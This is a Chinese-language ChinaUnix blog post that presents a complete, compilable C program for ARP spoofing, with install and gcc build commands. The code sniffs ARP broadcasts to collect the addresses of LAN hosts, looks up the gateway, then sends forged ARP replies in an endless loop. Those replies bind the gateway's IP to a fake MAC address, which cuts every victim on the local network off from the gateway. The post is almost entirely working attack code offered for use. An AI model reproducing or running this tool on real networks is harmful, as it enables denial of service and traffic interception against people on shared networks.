arp欺骗程序 v1.0.0-zooyo-ChinaUnix博客

Keepfvcking!zooyo.blog.chinaunix.net

首页　| 　博文目录　| 　关于我

zooyo

博客访问： 2978878
博文数量： 272
博客积分： 5544
博客等级：大校
技术积分： 5496
用户组：普通用户
注册时间： 2011-03-08 00:48

个人简介

　　每个人都要有一个骨灰级的爱好，不为金钱，而纯粹是为了在这个领域享受追寻真理的快乐。

文章分类

全部博文（272）

C（39）
Sed（45）
Awk（91）
Shell编程（33）
Linux命令（16）
Linux系统（42）

嵌入式（3）

WEB系统（3）

日志系统（5）
其他文章（6）
未分配的博文（0）

文章存档

2015年（2）

2014年（5）

2013年（25）

2012年（58）

2011年（182）

我的朋友

相关博文

arp欺骗程序 v1.0.0

分类： LINUX

2012-06-22 00:59:59

输入需要监听的网卡，再输入监听的arp广播包，内网只有几台客户端的话，捕获30个数据包左右，内网机器数量大的话，监听个上百个包吧，可能等待时间长一点。静默分析完数据包后，开始循环发arp欺骗应答。需要pcap和libnet的开发包，ubuntu系统执行 apt-get install -y libpcap-dev libnet-dev 命令即可。编译命令: gcc -o filename codefile.c -lpcap -lnet

#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <pcap.h>
#include <string.h>
#include <linux/if_ether.h>
#include <list.h>
#include <libnet.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#define SNAP_LEN 1518
#define MIN_LEN (sizeof(struct ethhdr) + 28)
#ifdef DEBUG
#define DEBUGP(format,args...) fprintf(stdout, format, ##args)
#else
#define DEBUGP(format,args...)
#endif
static struct list_head listhead;
static pcap_t *handle;
libnet_t *l;
typedef struct mac_ip{
struct list_head list;
u_char mac_addr[6];
u_int32_t ip_addr;
int status;
}mac_ip_t;
struct arp_hdr{
u_int16_t type;
u_int16_t proto;
u_int8_t hdlen;
u_int8_t protolen;
u_int16_t op;
u_int8_t send_mac[6];
u_int32_t send_ip;
u_int8_t rev_mac[6];
u_int32_t rev_ip;
} __attribute__ ((packed));
#define BUFSIZE 8192
struct route_info{
u_int dstAddr;
u_int srcAddr;
u_int gateWay;
char ifName[IF_NAMESIZE];
};
int readNlSock(int sockFd, char *bufPtr, int seqNum, int pId)
{
struct nlmsghdr *nlHdr;
int readLen = 0, msgLen = 0;
do{
//收到内核的应答
if((readLen = recv(sockFd, bufPtr, BUFSIZE - msgLen, 0)) < 0)
{
perror("SOCK READ: ");
return -1;
}
nlHdr = (struct nlmsghdr *)bufPtr;
//检查header是否有效
if((NLMSG_OK(nlHdr, readLen) == 0) || (nlHdr->nlmsg_type == NLMSG_ERROR))
{
perror("Error in recieved packet");
return -1;
}
/* Check if the its the last message */
if(nlHdr->nlmsg_type == NLMSG_DONE)
{
break;
} else {
/* Else move the pointer to buffer appropriately */
bufPtr += readLen;
msgLen += readLen;
}
/* Check if its a multi part message */
if((nlHdr->nlmsg_flags & NLM_F_MULTI) == 0)
{
/* return if its not */
break;
}
} while((nlHdr->nlmsg_seq != seqNum) || (nlHdr->nlmsg_pid != pId));
return msgLen;
}
//分析返回的路由信息
void parseRoutes(struct nlmsghdr *nlHdr, struct route_info *rtInfo, u_int32_t *gateway)
{
struct rtmsg *rtMsg;
struct rtattr *rtAttr;
int rtLen;
char *tempBuf = NULL;
struct in_addr dst;
tempBuf = (char *)malloc(100);
rtMsg = (struct rtmsg *)NLMSG_DATA(nlHdr);
// If the route is not for AF_INET or does not belong to main routing table
//then return.
if((rtMsg->rtm_family != AF_INET) || (rtMsg->rtm_table != RT_TABLE_MAIN))
return;
/* get the rtattr field */
rtAttr = (struct rtattr *)RTM_RTA(rtMsg);
rtLen = RTM_PAYLOAD(nlHdr);
for(;RTA_OK(rtAttr,rtLen);rtAttr = RTA_NEXT(rtAttr,rtLen))
{
switch(rtAttr->rta_type)
{
case RTA_OIF:
if_indextoname(*(int *)RTA_DATA(rtAttr), rtInfo->ifName);
break;
case RTA_GATEWAY:
rtInfo->gateWay = *(u_int *)RTA_DATA(rtAttr);
break;
case RTA_PREFSRC:
rtInfo->srcAddr = *(u_int *)RTA_DATA(rtAttr);
break;
case RTA_DST:
rtInfo->dstAddr = *(u_int *)RTA_DATA(rtAttr);
break;
}
}
dst.s_addr = rtInfo->dstAddr;
if (strstr((char *)inet_ntoa(dst), "0.0.0.0"))
{
*gateway = rtInfo->gateWay;
}
free(tempBuf);
return;
}
/********************************************************************
* 函数名： get_gateway
* 参数名： gateway(u_int32_t *gateway) 网关
* 返回值： 0 成功
* -1 失败
* 功能：传入一个无符号整形指针,函数会修改其值为本机的网络序的网关
********************************************************************/
int get_gateway(u_int32_t *gateway)
{
struct nlmsghdr *nlMsg;
struct rtmsg *rtMsg;
struct route_info *rtInfo;
char msgBuf[BUFSIZE];
int sock, len, msgSeq = 0;
//创建 Socket
if((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE)) < 0)
{
perror("Socket Creation: ");
return -1;
}
/* Initialize the buffer */
memset(msgBuf, 0, BUFSIZE);
/* point the header and the msg structure pointers into the buffer */
nlMsg = (struct nlmsghdr *)msgBuf;
rtMsg = (struct rtmsg *)NLMSG_DATA(nlMsg);
/* Fill in the nlmsg header*/
nlMsg->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtmsg)); // Length of message.
nlMsg->nlmsg_type = RTM_GETROUTE; // Get the routes from kernel routing table .
nlMsg->nlmsg_flags = NLM_F_DUMP | NLM_F_REQUEST; // The message is a request for dump.
nlMsg->nlmsg_seq = msgSeq++; // Sequence of the message packet.
nlMsg->nlmsg_pid = getpid(); // PID of process sending the request.
/* Send the request */
if(send(sock, nlMsg, nlMsg->nlmsg_len, 0) < 0)
{
printf("Write To Socket Failed...\n");
return -1;
}
/* Read the response */
if((len = readNlSock(sock, msgBuf, msgSeq, getpid())) < 0) {
printf("Read From Socket Failed...\n");
return -1;
}
/* Parse and print the response */
rtInfo = (struct route_info *)malloc(sizeof(struct route_info));
for(; NLMSG_OK(nlMsg,len); nlMsg = NLMSG_NEXT(nlMsg,len)){
memset(rtInfo, 0, sizeof(struct route_info));
parseRoutes(nlMsg, rtInfo, gateway);
}
free(rtInfo);
close(sock);
return 0;
}
#if 0 /* 转换CIDR */
static int ntod(u_int32_t mask)
{
int i, n = 0;
int bits = sizeof(u_int32_t) * 8;
for(i = bits - 1; i >= 0; i--) {
if (mask & (0x01 << i))
n++;
}
return n;
}
#else
static u_int32_t ntod(const u_int32_t netmask)
{
u_int32_t mask;
float f;
mask = ntohl(netmask);
mask = -mask;
f = mask;
mask = *(unsigned*)&f;
mask = 159-(mask>>23);
return mask;
}
#endif
static void print_alldevs(const pcap_if_t *d, int *i)
{
struct sockaddr_in *ipaddr, *mask;
printf("\n");
for(; d; d=d->next)
{
/* 比较前3个字符是eth的打印 */
if(!strncmp("eth", d->name, 3))
{
/* 注意: IP和掩码都是存储在next结构体中
把sockaddr转换为sockaddr_in类型(都是16字节长度)
直接可以取in_addr成员做点十进制转换 */
ipaddr = (struct sockaddr_in *)d->addresses->next->addr;
mask = (struct sockaddr_in *)d->addresses->next->netmask;
printf(" [%d] %s %s/%d\n", ++*i, d->name,
inet_ntoa(ipaddr->sin_addr),
ntod(mask->sin_addr.s_addr));
}
}
printf("\n");
}
static void print_arp_info(struct arp_hdr *arph, struct ethhdr *ethh)
{
/* 调试打印收到的arp请求广播的发送方MAC和IP */
mac_ip_t test;
test.ip_addr = arph->send_ip;
memcpy(test.mac_addr, ethh->h_source, 6);
printf("MAC: %02x:%02x:%02x:%02x:%02x:%02x IP: %s\n",
test.mac_addr[0], test.mac_addr[1], test.mac_addr[2],
test.mac_addr[3], test.mac_addr[4], test.mac_addr[5],
inet_ntoa(*(struct in_addr *)&test.ip_addr)
);
}
static int add_mac_ip(const char *mac, const u_int32_t ip)
{
struct mac_ip *h;
h = (struct mac_ip *)malloc(sizeof(mac_ip_t));
if(!h) return -1;
INIT_LIST_HEAD(&h->list);
memcpy(h->mac_addr, mac, 6);
h->ip_addr = ip;
h->status = 1;
list_add_tail(&h->list, &listhead);
return 0;
}
static int lookup_list(const u_char *mac)
{
mac_ip_t *h;
list_for_each_entry(h, &listhead, list) {
if(memcmp(mac, h->mac_addr, 6) == 0){
return h->status;
}
}
return -1;
}
static void packet_callback(u_char *args, const struct pcap_pkthdr *header,
const u_char *packet)
{
if(header->caplen < MIN_LEN) return;
struct ethhdr *ethh;
struct arp_hdr *arph;
ethh = (struct ethhdr *)packet;
packet += sizeof(struct ethhdr);
arph = (struct arp_hdr *)packet;
if(lookup_list(ethh->h_source) == -1)
{
add_mac_ip(ethh->h_source, arph->send_ip);
}
/* 调试打印arp报文信息 */
print_arp_info(arph, ethh);
}
static void print_list(void)
{
printf("\nPrint List info\n");
mac_ip_t *h;
mac_ip_t test;
list_for_each_entry(h, &listhead, list)
{
test.ip_addr = h->ip_addr;
memcpy(test.mac_addr, h->mac_addr, 6);
printf("MAC: %02x:%02x:%02x:%02x:%02x:%02x IP: %s\n",
test.mac_addr[0], test.mac_addr[1], test.mac_addr[2],
test.mac_addr[3], test.mac_addr[4], test.mac_addr[5],
inet_ntoa(*(struct in_addr *)&test.ip_addr)
);
}
}
static void clean_list(void)
{
mac_ip_t *h,*htmp;
if(list_empty(&listhead)) return;
list_for_each_entry_safe(h, htmp, &listhead, list)
{
list_del(&h->list);
free(h);
}
}
static int send_arp_reply(const char *dev, const u_int32_t gateway,
const mac_ip_t *target)
{
char device[6] = {0};
u_int32_t dst_ip, src_ip;
u_int8_t src_mac[6] = {0x12, 0x34, 0x56, 0x78, 0x99, 0x99}; /* 虚假的源MAC */
u_int8_t dst_mac[6] = {0}; /* 干扰的目标MAC */
char error[LIBNET_ERRBUF_SIZE]; /* 出错信息 */
libnet_ptag_t arp_tag, eth_tag;
strncpy(device, dev, sizeof(device)-1);
/* 网络序的网关 */
src_ip = gateway;
/* 干扰的网络序目标IP */
dst_ip = target->ip_addr;
/* 干扰的目标MAC */
memcpy(dst_mac, target->mac_addr, 6);
if ( (l = libnet_init(LIBNET_LINK_ADV, device, error)) == NULL ) {
printf("libnet_init: error [%s]\n", error);
return -2;
};
/* 构造arp协议块 */
arp_tag = libnet_build_arp(
ARPHRD_ETHER, /* 硬件类型,1表示以太网硬件地址 */
ETHERTYPE_IP, /* 0x0800表示询问IP地址 */
6, /* 硬件地址长度 */
4, /* IP地址长度 */
ARPOP_REPLY, /* 操作方式:ARP请求 */
src_mac, /* source MAC addr */
(u_int8_t *)&src_ip, /* src proto addr */
dst_mac, /* dst MAC addr */
(u_int8_t *)&dst_ip, /* dst IP addr */
NULL, /* no payload */
0, /* payload length */
l, /* libnet tag */
0 /* Create new one */
);
if (arp_tag == -1) {
printf("build IP failure\n");
return -3;
}
/* 构造一个以太网协议块
You should only use this function when
libnet is initialized with the LIBNET_LINK interface.*/
eth_tag = libnet_build_ethernet(
dst_mac, /* 以太网目的地址 */
src_mac, /* 以太网源地址 */
ETHERTYPE_ARP, /* 以太网上层协议类型，此时为ARP请求 */
NULL, /* 负载，这里为空 */
0, /* 负载大小 */
l, /* Libnet句柄 */
0 /* 协议块标记，0表示构造一个新的 */
);
if (eth_tag == -1) {
printf("build eth_header failure\n");
return -4;
}
libnet_write(l);
return 0;
}
static void select_dev(int *i, int* inum)
{
printf("Enter the interface number (1-%d):", *i);
scanf("%d", inum);
while(getchar() != '\n')
continue;
if(*inum < 1 || *inum > *i)
{
printf("Interface number out of range.\n");
exit(-3);
}
return;
}
static void type_counter(int *counter)
{
printf("Enter capture the number of packets: ");
scanf("%d", counter);
while (getchar() != '\n')
continue;
}
int main()
{
pcap_if_t *alldevs, *d;
char errbuf[PCAP_ERRBUF_SIZE];
int inum, i = 0, counter;
char filter_exp[] = "arp", ch;
struct bpf_program fp;
struct sockaddr_in *ipaddr;
u_int32_t gateway = 0;
char dev[6] = {0};
mac_ip_t *s;
/* 取得所有网卡信息 */
if(pcap_findalldevs(&alldevs, errbuf) == -1)
{
fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
exit(-1);
} else {
d = alldevs;
}
/* 打印所有以太网卡信息 */
print_alldevs(d, &i);
if(i==0)
{
printf("No interfaces found!\n");
pcap_freealldevs(alldevs);
exit(-2);
}
/* 用户选择网卡 */
select_dev(&i, &inum);
/* 用户输入抓包数 */
type_counter(&counter);
/* 选择指定的网卡 */
for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
DEBUGP("dev = %s\n", d->name);
strncpy(dev, d->name, sizeof(dev)-1);
/* 打开网卡准备抓包 */
handle = pcap_open_live(
d->name, /* 设备名 */
SNAP_LEN, /* 捕获的数据长度 */
1, /* 混杂模式为非0值 */
1, /* timeout */
errbuf /* 错误信息 */
);
if (handle == NULL)
{
fprintf(stderr, "Couldn't open device %s: %s\n", d->name, errbuf);
pcap_freealldevs(alldevs);
exit(-4);
}
/* 编译过滤器规则 */
ipaddr = (struct sockaddr_in *)d->addresses->next->addr;
if (pcap_compile(handle, &fp, filter_exp, 0, ipaddr->sin_addr.s_addr) == -1)
{
fprintf(stderr, "Couldn't parse filter %s: %s\n",
filter_exp, pcap_geterr(handle));
exit(-5);
}
DEBUGP("IP = %s\n", inet_ntoa(*(struct in_addr *)&ipaddr->sin_addr.s_addr));
/* 允许过滤器 */
if (pcap_setfilter(handle, &fp) == -1) {
fprintf(stderr, "Couldn't install filter %s: %s\n",
filter_exp, pcap_geterr(handle));
exit(-6);
}
pcap_freealldevs(alldevs);
/* 设置抓包方向为数据接收 */
if(pcap_setdirection(handle, PCAP_D_IN) < 0)
{
pcap_perror(handle, (char *)"pcap_setdirection");
exit(-7);
}
/* 初始化链表 */
INIT_LIST_HEAD(&listhead);
/* 开始循环抓包,调用packet_callback处理 */
pcap_loop(handle, counter, packet_callback, NULL);
pcap_close(handle);
/* 调试打印list成员信息 */
print_list();
/* 获取网关 */
get_gateway(&gateway);
printf("\nPress Ctrl^C to abort!\n");
while(1)
{
list_for_each_entry(s, &listhead, list)
{
if(send_arp_reply(dev, gateway, s) == 0)
libnet_destroy(l);
}
usleep(1000);
}
clean_list();
return 0;
}

阅读(2745) | 评论(0) | 转发(0) |

上一篇：linux下取得本机ip、掩码、网关

下一篇：ioctl()获取本地网卡设备信息

给主人留下些什么吧！~~

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6